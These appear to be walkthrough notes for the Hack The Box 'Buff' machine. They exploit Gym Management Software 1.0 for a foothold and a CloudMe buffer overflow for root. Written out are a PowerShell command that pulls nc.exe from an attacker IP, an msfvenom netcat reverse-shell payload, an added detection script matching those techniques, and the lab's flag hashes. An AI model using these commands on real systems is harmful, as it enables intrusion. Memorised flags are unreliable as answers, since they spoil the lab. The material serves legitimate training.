Windows Boxes

buff

  1. nmap
  2. gym management software 1.0
    1. unauthenticated RCE exploit
    2. reverse shell
  3. privesc w/ CloudMe_1112.exe
    1. searchsploit CloudMe
    2. generate shell code
    3. plink
    4. reverse shell
  4. user/root

buff

images/1647-1.png
images/1647-2.png

nmap

images/1648-1.png
nmap shows the only service running is HTTP on port 8080.

gym management software 1.0

The web server's contact.php page carries a note that Buff's site runs on Gym Management Software 1.0.

images/1649-1.png


Googling Gym Management Software 1.0 turns up an Unauthenticated Remote Code Execution vulnerability.
images/1649-2.png

images/1649-3.png

unauthenticated RCE exploit

images/1651-1.png

images/1651-2.png

We can look up the exploit locally using searchsploit and the Exploit Database ID number.
images/1651-3.png


python gym_software_exploit.py http://10.10.10.198:8080/ <- don't forget the trailing slash
images/1651-4.png

We have a foothold! Since this shell is limited, let's call a fully functional shell back to our attack machine.

reverse shell

An easy way to do that is to have the victim download netcat for Windows and execute it remotely to call a shell back to us.

First locate nc.exe, move it to your working directory, and spin up an HTTP server.
images/1652-1.png
images/1652-2.png

Then have the victim download it:
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.13/nc.exe','C:\xampp\htdocs\gym\upload\nc.exe')
images/1652-3.png
images/1652-4.png


images/1652-5.png
images/1652-6.png
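From the defender's side, the foothold and reverse-shell steps above leave a distinctive process-creation trail: a web server process spawning a shell, a PowerShell download cradle, an executable dropped under the web root, and nc.exe launched with -e. The following Python, an added example and not part of the original notes, runs simple detection rules over constructed Sysmon-style process events; the `Image | ParentImage | CommandLine` pipe-separated layout is assumed here for illustration, not a real log format.

```python
import re

# Constructed Sysmon-style process-creation events (Image | ParentImage | CommandLine);
# the pipe-separated layout is assumed for illustration, not a real log format.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe | C:\xampp\apache\bin\httpd.exe | cmd.exe /c whoami",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\cmd.exe | "
    r"powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.13/nc.exe','C:\xampp\htdocs\gym\upload\nc.exe')",
    r"C:\xampp\htdocs\gym\upload\nc.exe | C:\Windows\System32\cmd.exe | nc.exe -e cmd.exe 10.10.14.13 4444",
    r"C:\Windows\System32\notepad.exe | C:\Windows\explorer.exe | notepad.exe notes.txt",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe | powershell.exe -c Get-Date",
]

# Web server processes that should never be launching interactive shells
WEB_SERVER_IMAGES = {"httpd.exe", "php.exe", "php-cgi.exe", "w3wp.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# Command-line patterns matching the tradecraft seen on this box
RULES = [
    # PowerShell / LOLBin download cradles used to pull tooling onto the host
    ("powershell_download_cradle",
     re.compile(r"\b(DownloadFile|DownloadString|Invoke-WebRequest|iwr|curl|wget)\b", re.I)),
    # An .exe written to, or executed from, a web-root upload directory
    ("binary_in_webroot",
     re.compile(r"\\htdocs\\[^\s']*\\[^\s']+\.exe", re.I)),
    # netcat launched with -e to hand a shell to a remote listener
    ("netcat_exec_shell",
     re.compile(r"\bnc(64)?\.exe\b.*\s-e\s+\S*cmd\.exe", re.I)),
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(line):
    """Return (rule_name, event) pairs for every rule this event trips."""
    image, parent, cmdline = (part.strip() for part in line.split(" | ", 2))
    hits = []
    # Parent/child check: a web server process directly spawning a shell
    if _basename(parent) in WEB_SERVER_IMAGES and _basename(image) in SHELL_IMAGES:
        hits.append(("webserver_spawned_shell", line))
    # Pattern checks run over the whole event so the image path counts too
    for name, pattern in RULES:
        if pattern.search(line):
            hits.append((name, line))
    return hits


def scan(events):
    return [hit for event in events for hit in check_event(event)]
```

Running `scan(SAMPLE_EVENTS)` flags the first three constructed events and leaves the two benign ones alone.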

privesc w/ CloudMe_1112.exe

Looking in the Downloads folder of shaun, the user we now own, we see an interesting executable named CloudMe_1112.exe.

images/1660-1.png

searchsploit CloudMe

images/1656-1.png

We'll choose the first exploit and mirror it to our directory with searchsploit -m windows/remote/48389
images/1656-2.png

generate shell code

Since the buffer overflow exploit is mostly written for us already, all we need to do is swap in shellcode that calls back to our attack machine.

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.62 4444' -f py -b '\x00\x0a\x0d' -v payload
images/1657-1.png

images/1657-2.png

Now replace 48389's shellcode with our msfvenom-generated shellcode.
images/1657-3.png

reverse shell

Make sure you set up your listener from user st0ve, since that's what our victim is plinked to.


We run our exploit, which attacks our localhost (127.0.0.1 on port 8888, which forwards to Buff's port 8888) and....
images/1659-1.png

We're root.
images/1659-2.png

user/root

images/1654-1.png
29a8c6e451149cf2499ebabeb7aec7d4

images/1654-2.png
d8f697cf088291568ccf206c16ea3b49